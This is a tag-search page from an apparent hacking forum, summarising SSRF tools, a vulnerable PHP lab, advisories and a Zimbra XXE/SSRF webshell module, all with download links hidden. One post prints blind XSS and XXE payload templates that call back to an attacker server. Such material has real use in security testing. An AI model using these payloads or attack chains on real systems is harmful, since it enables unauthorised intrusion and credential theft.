Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
SERVICE

Search the Community

Showing results for tags 'ssrf'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Pentesting Zone
    • Pentesting Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Pentesting Premium
    • Pentesting Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Pentesting Zone PRIV8
    • Pentesting Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area
  • Recycle Bin
    • Recycle
  • Null3D's Nulled Group

Product Groups

  • PRIV8
  • Advertising
  • Access Basic
  • Seller
  • Services

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

Found 11 results

  1. A Burp Suite extension was made to automate the process of finding reverse proxy path-based SSRF. [hide][Hidden Content]]
  2. BurpParamFlagger A Burp extension adding a passive scan check to flag parameters whose name or value may indicate a possible insertion point for SSRF or LFI. Note: I believe that Burp Pro is required to use this extension since it adds to the scanner functionality, which isn’t included in the Community version. [hide][Hidden Content]]
  3. ssrf-king SSRF plugin for burp that Automates SSRF Detection in all of the Request Upcoming Features Checklist ✔️ It will soon have a user Interface to specify your own call back payload It will soon be able to test Json & XML Features ✔️ Test all of the requests for any external interactions. ✔️ Checks to see if any interactions are not the user’s IP if it is, it’s an open redirect. ✔️ Alerts the user for any external interactions with information such as: Endpoint Vulnerable Host Location Found It also performs the following tests based on this research. Scanning Options ✔️ Supports Both Passive & Active Scanning. Example Load the website you want to test. Load the plugin. Keep note of the Burp Collab Payload. Passively crawl the page, ssrf-king test everything in the request on the fly.SSRF Detection When it finds a vulnerability it logs the information and adds an alert. From here onwards you would fuzz the parameter to test for SSRF. SSRF-King v1.12 I have released v1.12 that has a small UI Design where you can specify your own call-back payload. Changes: Implemented checkbox for http:// and https:// Plugin now uses JDK 14 code compliance 9 which should work with all versions, let me know if it doesn't Bug fixes: Fixed parameter testing. When it reported a X-Forwarded-Host it came up as X-Forwarded-For The test cases for the following are now fixed and work. [hide][Hidden Content]]
  4. lorsrf Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods. [hide][Hidden Content]]
  5. SSRFIRE An automated SSRF finder. Just give the domain name and your server and chill! 😉 It also has options to find XSS and open redirects. Finding XSS Warning: This generates a lot of traffic. Do not use this against the sites which you are not authorized to test This tests all the URLs fetched, and based on how the input is reflected in the response, it adds that particular URL to the output/domain.com/xss-suspects.txt (This may contain false positives) For further testing, you can input this list to the XSS detection tools like XSStrike to find XSS. Finding open redirects Just enter the path to a payload file or use the default payload. I personally prefer openredirex, as it is specifically designed to check for open redirects by loading the URLs from the list and it looks a lot cleaner, and doesn’t flood your terminal. [HIDE][Hidden Content]]
  6. Various Open-Xchange OX App Suite versions suffer from server-side request forgery, cross site scripting, information disclosure, and improper access control vulnerabilities. View the full article
  7. Server-Side Request Forgery (SSRF) vulnerable Lab This repository contain PHP codes which are vulnerable to Server-Side Request Forgery (SSRF) attack. I would like to say Thank You to @albinowax, AKReddy, Vivek Sir (For being great personalities who always supported me), Andrew Sir - @vanderaj (for his encouraging words) and those researchers who contirubuted in DNS rebinding attack based research Vulnerable codes are meant to demonstrate SSRF for below mentioned 5 scenarios: 1. Application code that fetches and display the content of the specified file In programming languages, there are functions which can fetch the contents of locally saved file. These functions may be capable of fetching the content from remote URLs as well local files (e.g file_get_contents in PHP). This functionality can be abused if application is not prepending any string to the user supplied data to fetch the content from a file i.e application is not prepeding and directory name or path to the user supplied data. In this case, these data fetching function can process the schemes like "http://" or "file://". When user specifies the remote URL in place of file name like "[Hidden Content]", the data fetching function extract the data from the specified URL. In case if application is prepending any data string (for example any directory name) to user data, "http://" or "file://" scheme won't work and exploitation of SSRF vulnerability is not possible. Guide to Exploitation of Scenario 1 2. Application provides interface to connect to Remote Host Web application has interfaces that allow an user to specify the any IP with any port. Here the application has functionality which tries to connect to service like "MySQL", "LDAP" etc. Application expects user to specify the remote server hostname/IP, username and password in input fields. Application then tries to connect to the remote server over specified port. Here in this scenario, application tries to communicate to remote service listening on specific port. When vulnerable code has functionality to connect to server like MySQL and user specified the SMB port, vulnerable application will try to communicate to SMB servie using MySQL server service packets. Even though, the port is open, we are not able to communicate to the service due to difference in way of communication. This behaviour can be exploited to perform internal network scanning not just to enumerate IPs but Ports as well on those live IPs. Guide to Exploitation of Scenario 2 3. Application with File Download Functionality In this case, an attacker can exploit this functionality to perform IP scanning inside the network where application server is hosted. The function which performs the task of downloading file from server, can download file not just from local server but also from SMB path as well. This is something which can help an attacker to figure out the Windows based machines in the network. Web application hosted on Windows OS will process the SMB path as well if file download functionality is processing user input without prepending any data. Guide to Exploitation of Scenario 3 4. Bypassing IP blacklisting using DNS Based Spoofing The script has funcionality which allow user to fetch data from remote URL. User need to specify the remote URL with any IP or domain name. The script perform check if user has specified the input as "localhost", "Internal IPs" or "Reserved IPs". If domain/IP specified by user is blacklisted, script will not fetch the content and stop processing. Guide to Exploitation of Scenario 4 5. Bypassing IP blacklisting using DNS Rebinding Technique Application has implemented black listing of not just internal and private range IPs but also rsolve the user supplied domain to its IP and again perform check if resolved is black listed or not. In this case, DNS based spoofing trick will also not work to access the content hosted on internal/Reserved IP. Application code perform domain resolution to its IP and again perform black listed IP check for the resolved IP. Guide to Exploitation of Scenario 5 Ofcourse, --==[[ With Love From IndiShell ]]==-- --==[[ Greetz To ]]==-- Guru ji zero, Code breaker ICA, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad, Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256 Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, D2, Bikash Dash and rest of the Team INDISHELL --==[[Love to]]==-- My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP Mohit, Ffe, Shardhanand, Budhaoo, Jagriti, Hacker fantastic, Jennifer Arcuri, Thecolonial, Anurag Bhai Ji and Don(Deepika kaushik) [HIDE][Hidden Content]]
  8. 0x1

    B-XSSRF

    Toolkit to detect and keep track on Blind XSS, XXE & SSRF SETUP Upload the files to your server. Create a Database and upload database.sql file to it. Change the DB Credentials in db.php file. Ready. USAGE BLIND XSS <embed src="[Hidden Content]; <script src="[Hidden Content]; BLIND XXE <?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "[Hidden Content]; %ext; ]> <r></r> SSRF GET /testssrf.php=[Hidden Content] DEFAULT CREDENTIALS USER : [email protected] PASS : 123456 Source & Download [hide][Hidden Content]]
  9. This Metasploit module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the zimbra account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the zimbra credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the Client Upload servlet is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition. View the full article
  10. SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz. [HIDE][Hidden Content]]
  11. Open-Xchange OX App Suite suffers from cross site scripting and server-side request forgery vulnerabilities. The vulnerabilities spawn a multitude of versions. View the full article
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.